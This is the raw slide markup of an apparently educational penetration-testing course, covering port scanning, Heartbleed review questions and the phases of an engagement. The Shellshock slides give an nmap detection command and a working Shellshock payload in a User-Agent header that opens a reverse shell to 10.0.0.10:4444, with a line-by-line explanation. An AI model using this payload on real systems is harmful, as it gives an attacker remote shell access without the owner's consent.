              <a:t>10.0.0.101:443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2341" name="Google Shape;2341;p135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-188" y="35357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Test both machines for vulnerability to Shellshock. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2342" name="Google Shape;2342;p135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12" y="4059600"/>
            <a:ext cx="9144000" cy="780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solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status.cgi 10.0.0.100,10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>You'll find that 10.0.0.100 is vulnerable.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>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6" name="Shape 2346"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2347" name="Google Shape;2347;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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2348" name="Google Shape;2348;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Solutions to the following questions are foun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>d on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0366D6"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Heartbleed website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2349" name="Google Shape;2349;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50" name="Google Shape;2350;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1" name="Google Shape;2351;p136"/>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17500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Why it is called the Heartbleed Bug?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What makes the Heartbleed Bug unique?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is being leaked?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is the leaked primary key material and how does one recover?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is the leaked secondary key material and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>how does one recover?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is the leaked protected content and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>how does one recover?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What is the leaked collateral and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>how does one recover?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What versions of the OpenSSL are affected?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How common are the vulnerable OpenSSL versions?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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5" name="Shape 2355"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2356" name="Google Shape;2356;p13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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0 minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2357" name="Google Shape;2357;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58" name="Google Shape;2358;p1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9" name="Google Shape;2359;p13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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shellshock Exploitation</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will use the Linux Exploitation, beginning at with Part 4: Exploit the Shellshock Vulnerability. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Instructions </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>sent via Slack.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </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3" name="Shape 2363"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2364" name="Google Shape;2364;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5" name="Google Shape;2365;p1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6" name="Google Shape;2366;p138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536250" y="3682625"/>
            <a:ext cx="4220400" cy="7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Shellshock Exploitation</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0" name="Shape 2370"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2371" name="Google Shape;2371;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Shellshock Exploitation Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2372" name="Google Shape;2372;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Note the payload: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>User-Agent: () { :;};echo -e "\r\n$(/bin/bash -i &gt;&amp; /dev/tcp/10.0.0.10/4444 0&gt;&amp;1)"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2373" name="Google Shape;2373;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4" name="Google Shape;2374;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5" name="Google Shape;2375;p139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1839650"/>
            <a:ext cx="9144000" cy="30669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t>This complex payload opens a TCP connection to your computer’s port 4444.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> exploits Shellshock by creating a function. The code after gets executed by the shell.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono Medium"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>echo -e "\r\n$(/bin/bash -i &gt;&amp; /dev/tcp/10.0.0.10/4444 0&gt;&amp;1)”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>/bin/bash -i &gt;&amp; /dev/tcp/10.0.0.10/444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>means "Run a new Bash shell in interactive mode. Send std error and standard output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>10.0.0.10:4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> through a TCP connection.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>0&gt;&amp;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> means "Read standard input (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) to this new shell through the TCP connection."</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>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0" name="Shape 2060"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Google Shape;2061;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Where Are We?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2062" name="Google Shape;2062;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9410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Today, we will focus on the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>middle three phases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of an engagement.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2063" name="Google Shape;2063;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64" name="Google Shape;2064;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Google Slides Template</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2065" name="Google Shape;2065;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1937825"/>
            <a:ext cx="25017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a:t>Intelligence Gathering</a:t>
            </a:r>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Reconnaissance is the most important step of an engagement.</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includes port scanning, banner grabbing, and enumeration.</a:t>
            </a:r>
            <a:endParaRPr>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2066" name="Google Shape;2066;p106"/>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a:t>Vulnerability Analysis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Study the results of your information gathering to identify potential attack vectors.</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67" name="Google Shape;2067;p106"/>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a:t>Exploitation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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Drill down on one of the vulnerabilities you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
